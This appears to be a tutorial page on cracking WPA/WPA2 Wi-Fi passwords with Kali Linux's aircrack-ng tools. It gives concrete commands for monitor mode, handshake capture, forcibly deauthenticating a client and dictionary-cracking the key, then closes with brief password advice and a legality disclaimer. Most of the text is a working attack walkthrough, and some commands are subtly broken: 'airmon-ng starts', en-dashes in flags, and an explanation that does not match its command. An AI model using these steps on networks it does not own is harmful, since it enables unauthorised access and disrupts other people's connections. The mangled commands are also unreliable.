Kali Linux is a Debian-derived Linux distribution with focus on digital forensics and penetration testing.
Kali Linux contains for example password cracking software and WLAN cracking software (aircrack-ng).
These instructions are for educational use.
Download Kali Linux http://www.kali.org/downloads/, we recommend downloading it via torrent for improved speed.
Installing Kali Linux is very similar to Debian installation.
List of packages that you can use to test your security. The point of these instructions is to demonstrate how easy it can be to crack into different kinds of systems and to help you improve your security.
NOTE! Cracking into your own systems is legal and moral. Cracking into the systems of other people without their consent is forbidden.
This package is used to crack WLAN networks.
1. We open terminal in root
2. We specify the wireless NIC
airmon-ng starts wlan0
3. This command lists all the WLAN networks near you
4. Now we focus on a certain access point and wait for connection to be formed
airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
- bssid = MAC address of the access point
- write WPAcrack = Directory where aircrack will write to -> root of your home folder
5. Leave the current terminal window open in the background and open a new one
aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
- --deauth 100 = Sever the connection 100 times
- -a 00:14:BF:E0:E8:D5 = BSSID from the access point
- -c 4C:EB:42:59:DE:31 = BSSID from the client device
Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
run command (shut down service)
Soon the other terminal window will print WPA handshake: 00:14:BF:E0:E8:D5
6. Begin with the actual cracking
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [source/*.cap]
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
- WPAcrack-01.cap = File with the hash from the password
- /usr/share/wordlist/* = file path to the password file
Then we just wait for the software to finish cracking
It will print KEY FOUND: [password]
Enhance your WLAN network security
As your security protocols you should use at least WPA2-PSK / WPA2-PERSONAL. These are still crackable by following our instructions though.
- Use a long password, preferably over 8 characters
- Uppercase and lowercase letters
- Special characters
- Preferably not a word or a sentence